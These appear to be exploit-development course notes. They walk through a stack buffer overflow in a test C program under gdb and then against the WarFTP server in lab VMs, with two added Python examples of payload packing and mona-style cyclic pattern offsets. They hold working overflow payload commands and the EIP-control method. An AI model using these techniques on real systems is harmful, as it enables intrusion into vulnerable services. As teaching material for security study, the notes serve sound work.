
GrapeApe561 | Advanced Penetration Testing | Module 12 - Exploit Development

By: GrapeApe561 | Related Course: Advanced Penetration Testing | Published: March 31, 2018 | Modified: April 5, 2018

Part 4: GNU Compilers

(On Ubuntu VM): cat overflowtest.c

gcc -g -fno-stack-protector -o overflowtest overflowtest.c

./overflowtest AAAA

./overflowtest AAAAAAAAAAAAAAAAAAA

gdb overflowtest

(gdb) list 1,16

(gdb) break 14

(gdb) break 10

(gdb) break 11

(gdb) run AAAA

(gdb) help x

(gdb) x/16xw $esp

(gdb) x/xw $ebp

(gdb) continue

(gdb) x/16xw $esp

(gdb) x/xw $ebp

(gdb) disassemble main

(gdb) set disassembly-flavor intel

(gdb) disassemble main

(gdb) x/16xw $esp

(gdb) continue

(gdb) x/16xw $esp

(gdb) continue
Part 5: Python

(gdb) run $(python -c 'print "A" * 9 + "B" * 4')

(gdb) x/16xw $esp

(gdb) x/xw $ebp

(gdb) continue

(gdb) x/16xw $esp

(gdb) disassemble main

(gdb) x/xw $ebp

(gdb) continue

(gdb) x/16xw $esp

(gdb) info registers

(gdb) continue
Part 6: Unintended Code

(gdb) list 1,16

(gdb) disassemble overflowed

(gdb) run $(python -c 'print "A" * 9 + "\x08\x04\x83\xf4"'), answer y when asked to restart the program

(gdb) x/16xw $esp

(gdb) x/xw $ebp

(gdb) continue

(gdb) x/16xw $esp

(gdb) continue

(gdb) x/16xw $esp

(gdb) disassemble overflowed

(gdb) continue

(gdb) run $(python -c 'print "A" * 9 + "\xf4\x83\x04\x08"'), answer y when asked to restart the program

(gdb) continue

(gdb) continue

(gdb) continue

(gdb) x/16xw $esp

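The two run commands in Part 6 differ only in byte order, and the first one crashes because a 32-bit x86 CPU stores and loads the saved return address little-endian (least significant byte first). The following is an added illustration, not code from the original notes; the padding length (9) and the address 0x080483f4 are the values used in the commands above, and the function names are assumptions made for this example. It also covers the Part 5 run, showing what the four "B" bytes look like once loaded into a register.

```python
import struct

# Values taken from the gdb run commands in these notes:
# 9 bytes of "A" padding, then the 4-byte address 0x080483f4.
PADDING_LEN = 9
TARGET_ADDR = 0x080483f4


def pack_le32(addr):
    """Pack a 32-bit value the way x86 stores it in memory: least
    significant byte first. 0x080483f4 becomes the bytes f4 83 04 08."""
    return struct.pack("<I", addr)


def as_cpu_reads(raw4):
    """Interpret 4 bytes the way a 32-bit little-endian CPU loads them
    into a register such as EIP or EBP."""
    return struct.unpack("<I", raw4)[0]


def build_payload(addr, padding=PADDING_LEN):
    """Padding followed by the packed address: the equivalent of the
    Part 6 command python -c 'print "A" * 9 + "\\xf4\\x83\\x04\\x08"'."""
    return b"A" * padding + pack_le32(addr)


def explain(raw4):
    """Return (value the register would hold, whether it is the intended
    target) for 4 bytes written over the saved return address."""
    value = as_cpu_reads(raw4)
    return value, value == TARGET_ADDR


if __name__ == "__main__":
    # Constructed inputs mirroring the notes: the first Part 6 run (bytes in
    # the "wrong" order), the second run (little-endian), and the Part 5 run.
    samples = (
        ("Part 6, first run", b"\x08\x04\x83\xf4"),
        ("Part 6, second run", b"\xf4\x83\x04\x08"),
        ("Part 5, BBBB", b"BBBB"),
    )
    for label, raw in samples:
        value, ok = explain(raw)
        verdict = "matches target" if ok else "does not match target"
        print(f"{label}: register would hold 0x{value:08x} ({verdict})")
    print("payload bytes:", build_payload(TARGET_ADDR))
```

The first run leaves EIP holding 0xf4830408, an address that does not exist in the program, which is why gdb reports a fault there; the second run leaves EIP holding 0x080483f4 exactly as `x/xw $ebp` and `info registers` show.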


Part 7: Network-based Exploits and Debuggers

(On Windows XP VM): On the XAMPP Control Panel, stop FileZilla

Go to the WarFTP folder, click on the war-ftp daemon icon, click OK, then click the lightning bolt button

Double-click Immunity Debugger on the Desktop, click File –> Attach, click the line showing TCP port 21, then click Attach, then click the play button

(On Kali Linux VM): Copy warftpskel.py onto Desktop.

cd Desktop

cat warftpskel.py

chmod +x warftpskel.py

nano warftpskel.py, change IP address to your Windows XP IP address, exit

./warftpskel.py

man ascii (after viewing Immunity Debugger)
Part 8: Creating a Cyclic Pattern

(On Windows XP VM): In Immunity Debugger, click Debug –> Restart, click Yes, click the play button (if there is an error, delete FTPdaemon.dat from the warftp folder, then repeat the steps, plus click OK and click the lightning bolt button)

(On Windows XP VM): In Immunity Debugger, type the following: !mona pattern_create 1100

(On Windows XP VM): Start –> My Computer –> Local Disk (C:) –> logs folder –> warftpd –> pattern.txt, copy everything under "Pattern of 1100 bytes:"

(On Kali Linux VM): cd Desktop

nano warftpskel.py, put a hash sign (#) in front of the existing "buffer=" line to comment it out, then on the next line type buffer = " followed by the pasted pattern and a closing ", save

./warftpskel.py

In Immunity Debugger, type: !mona pattern_offset 32714131

In Immunity Debugger, type: !mona findmsp

(On Windows XP VM): Start –> My Computer –> Local Disk (C:) –> logs folder –> warftpd –> findmsp.txt, copy the EIP and ESP entries and save them in a separate file for reference
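To make the two mona commands above concrete, here is an added example (not the notes' own code and not mona's implementation) that builds the same Metasploit-style cyclic pattern and recovers the offset from the EIP value the debugger shows. The function names are assumptions; the EIP value 32714131 and the length 1100 are the ones from the notes. The lookup also accepts the four bytes as they appear in a memory dump, which the notes' commands do not show.

```python
import struct
from string import ascii_uppercase, ascii_lowercase, digits

# Hypothetical helpers reproducing the classic Metasploit/mona pattern:
# triples of (upper, lower, digit) such as "Aa0Aa1Aa2...". Every 4-byte
# window is unique within the first 26 * 26 * 10 * 3 = 20280 bytes.
MAX_UNIQUE = len(ascii_uppercase) * len(ascii_lowercase) * len(digits) * 3


def pattern_create(length):
    """Return a cyclic pattern of exactly `length` bytes (the equivalent of
    !mona pattern_create 1100)."""
    if length > MAX_UNIQUE:
        raise ValueError(f"pattern longer than {MAX_UNIQUE} bytes would repeat")
    chunks = []
    for up in ascii_uppercase:
        for lo in ascii_lowercase:
            for dg in digits:
                chunks.append(up + lo + dg)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length].encode("ascii")
    return "".join(chunks)[:length].encode("ascii")


def pattern_offset(eip_value, length=MAX_UNIQUE):
    """Offset of the 4 pattern bytes that landed in EIP (the equivalent of
    !mona pattern_offset 32714131). Accepts an int or the hex string as the
    debugger shows it. Returns -1 if the value did not come from the pattern."""
    if isinstance(eip_value, str):
        eip_value = int(eip_value, 16)
    # The register holds the 4 bytes loaded little-endian; packing the value
    # the same way gives them back in memory order ("1Aq2" for 0x32714131).
    needle = struct.pack("<I", eip_value)
    return pattern_create(length).find(needle)


def pattern_offset_ascii(text):
    """Same lookup when the 4 bytes are already in memory order, for example
    as seen in a hex dump of the stack."""
    return pattern_create(MAX_UNIQUE).find(text.encode("ascii"))


if __name__ == "__main__":
    pat = pattern_create(1100)
    print(pat[:30].decode(), "...", len(pat), "bytes")
    print("offset of EIP 0x32714131:", pattern_offset("32714131"))
    print("offset of bytes '1Aq2':", pattern_offset_ascii("1Aq2"))
```

Because the register value is shown as a number, the four bytes have to be reversed before searching; doing the search on the raw hex digits in display order would look for "2qA1" and fail. The pattern only stays unique for its first 20280 bytes, so an offset recovered from a longer buffer would be ambiguous.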
